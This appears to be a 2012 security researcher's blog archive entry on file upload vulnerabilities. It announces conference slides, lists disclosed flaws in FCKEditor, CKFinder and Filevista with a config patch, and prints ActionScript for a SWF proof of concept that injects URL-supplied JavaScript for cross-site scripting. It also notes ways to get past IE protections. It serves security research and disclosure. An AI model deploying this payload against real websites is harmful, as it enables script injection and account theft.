Monthly Archives: November 2012

File in the hole! – HackPra slides

Last week, I had a talk in Bochum University about file upload vulnerabilities. I am going to share the slides and clips with you as they are already public via HackPra website:

I have been told that the video will be available soon as well. I really recommend that you see the other talks in that website too.

Here are my slides in different formats:

Download the Power Point format

Download the PDF format

In this talk, I had revealed some 0days as examples (vendors already know about these issues):

File Upload Protection bypass in FCKEditor 2.6.8 ASP version (Mostafa Azizi, Soroush Dalili) [Page 53 of Power Point file]

Denial of Service issue in FCKEditor 2.6.8/CKFinder 2.3 (Soroush Dalili) [Page 54 of Power Point file]

Directory Traversal in GleamTech Filevista (Soroush Dalili) [Page 22 of Power Point file]

You may be able to find similar issues in other web applications that have file upload functionality by using some of these methods.


Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:

In “config.asp”, wherever you have:

      ConfigAllowedExtensions.Add    “File”,”Extensions Here”

Change it to:

      ConfigAllowedExtensions.Add    “File”,”^(Extensions Here)$”

XSS by uploading/including a SWF file

As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.

This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.

Note: IE has a protection to make the “document” object inaccessible when you open a SWF directly in a browser. I have bypassed IE8 protection by using a simple redirection in Javascript. I have also found a noisy way to bypass IE9 protection by opening a new window (you may be able to do it in a less noisy way – please leave your comments if you know any other bypass method).

Here is the actionscript code:

	import flash.display.Sprite;
	import flash.external.*;
	import flash.system.System;
	public class XSSProject extends Sprite
		public function XSSProject()
			ExternalInterface.marshallExceptions = true;
			try {"0);}catch(e){};"+root.loaderInfo.parameters.js+"///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/");
			} catch(e:Error) {

Compiled file is accessbile via:


Browsers other than IE:;




[1] The other reason to beware (URL:

[2] Flash JavaScript Injection – can make the websites vulnerable to XSS (URL: